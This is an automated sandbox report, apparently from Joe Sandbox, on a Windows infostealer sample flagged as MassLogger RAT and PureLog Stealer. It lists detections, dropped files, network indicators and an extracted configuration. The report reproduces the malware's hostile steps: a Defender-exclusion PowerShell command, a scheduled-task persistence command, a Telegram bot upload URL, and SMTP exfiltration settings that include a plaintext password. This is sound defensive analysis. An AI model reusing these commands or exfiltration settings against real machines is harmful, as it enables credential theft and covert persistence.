Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F7Xu8bRnXT.exe

Overview

General Information

Sample name:F7Xu8bRnXT.exe
renamed because original name is a hash value
Original sample name:75691dfc15e24ea4920f9309bc68aedf808fb60379c0410d898cafaab4f8328b.exe
Analysis ID:1562296
MD5:d023bb01175d237f56d56467e5806525
SHA1:bd936a27e63e60361d1191d058d13418084c7d04
SHA256:75691dfc15e24ea4920f9309bc68aedf808fb60379c0410d898cafaab4f8328b
Tags:exeuser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops large PE files
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • F7Xu8bRnXT.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\F7Xu8bRnXT.exe" MD5: D023BB01175D237F56D56467E5806525)
    • Trading_AIBot.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
      • powershell.exe (PID: 3504 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6396 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • schtasks.exe (PID: 5160 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • apihost.exe (PID: 1720 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: DE61BDDC20CC8EBAC6B7BDC55517BB73)
    • server01.exe (PID: 2200 cmdline: "C:\Users\user\AppData\Local\Temp\server01.exe" MD5: 0CDBE0CD3CB5C2F0B2CB17E4417D43F5)
  • cleanup
{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
SourceRuleDescriptionAuthorStrings
F7Xu8bRnXT.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 7E 88 44 24 2B 88 44 24 2F B0 8E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\server01.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x10191:$a1: get_encryptedPassword
        • 0x104cd:$a2: get_encryptedUsername
        • 0xff1e:$a3: get_timePasswordChanged
        • 0x1003f:$a4: get_passwordField
        • 0x101a7:$a5: set_encryptedPassword
        • 0x11b77:$a7: get_logins
        • 0x11828:$a8: GetOutlookPasswords
        • 0x11606:$a9: StartKeylogger
        • 0x11ac7:$a10: KeyLoggerEventArgs
        • 0x11663:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\server01.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          SourceRuleDescriptionAuthorStrings
          00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000001.00000002.2245462797.0000000005110000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 17 entries
                    SourceRuleDescriptionAuthorStrings
                    1.2.F7Xu8bRnXT.exe.34f5570.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      1.2.F7Xu8bRnXT.exe.3534590.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        1.2.F7Xu8bRnXT.exe.4ab0000.12.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          1.2.F7Xu8bRnXT.exe.5110000.14.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            1.3.F7Xu8bRnXT.exe.5e7398.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              Click to see the 50 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1628, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3504, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1628, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3504, ProcessName: powershell.exe
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1628, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1628, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5160, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1628, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5160, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1628, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3504, ProcessName: powershell.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-25T13:39:27.754596+010028032742Potentially Bad Traffic192.168.2.549721158.101.44.24280TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: F7Xu8bRnXT.exeAvira: detected
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeReversingLabs: Detection: 79%
                              Source: F7Xu8bRnXT.exeReversingLabs: Detection: 39%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeJoe Sandbox ML: detected
                              Source: F7Xu8bRnXT.exeJoe Sandbox ML: detected

                              Location Tracking

                              barindex
                              Source: unknownDNS query: name: reallyfreegeoip.org
                              Source: F7Xu8bRnXT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49724 version: TLS 1.0
                              Source: Binary string: _.pdb source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 01767394h2_2_01767188
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 017678DCh2_2_01767688
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h2_2_01767E60
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 017678DCh2_2_0176767B
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h2_2_01767FBC
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h2_2_01767E54
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 00C29731h3_2_00C29480
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 00C29E5Ah3_2_00C29A40
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 00C29E5Ah3_2_00C29A71
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 00C29E5Ah3_2_00C29A30
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 00C29E5Ah3_2_00C29D87
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 4x nop then jmp 04DBBCBDh11_2_04DBBA40
                              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                              Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                              Source: unknownDNS query: name: checkip.dyndns.org
                              Source: unknownDNS query: name: reallyfreegeoip.org
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 158.101.44.242:80
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49724 version: TLS 1.0
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                              Source: server01.exe, 00000003.00000002.3486443994.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                              Source: powershell.exe, 00000004.00000002.2335845547.0000000006E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: server01.exe, 00000003.00000002.3486443994.000000000288B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                              Source: server01.exe, 00000003.00000002.3486443994.000000000288B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: server01.exe, 00000003.00000002.3486443994.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2317843796.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                              Source: powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000004.00000002.2335088323.0000000006E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goAppVClientCmdlets.psm1h
                              Source: powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75d
                              Source: server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75l
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: server01.exe.1.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                              Source: server01.exe.1.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                              System Summary

                              barindex
                              Source: F7Xu8bRnXT.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 1.2.F7Xu8bRnXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 1.0.F7Xu8bRnXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                              Source: Trading_AIBot.exe.1.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                              Source: 1.2.F7Xu8bRnXT.exe.25b9e70.3.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                              Source: 1.2.F7Xu8bRnXT.exe.25a8a2c.5.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.2.dr 665670656Jump to dropped file
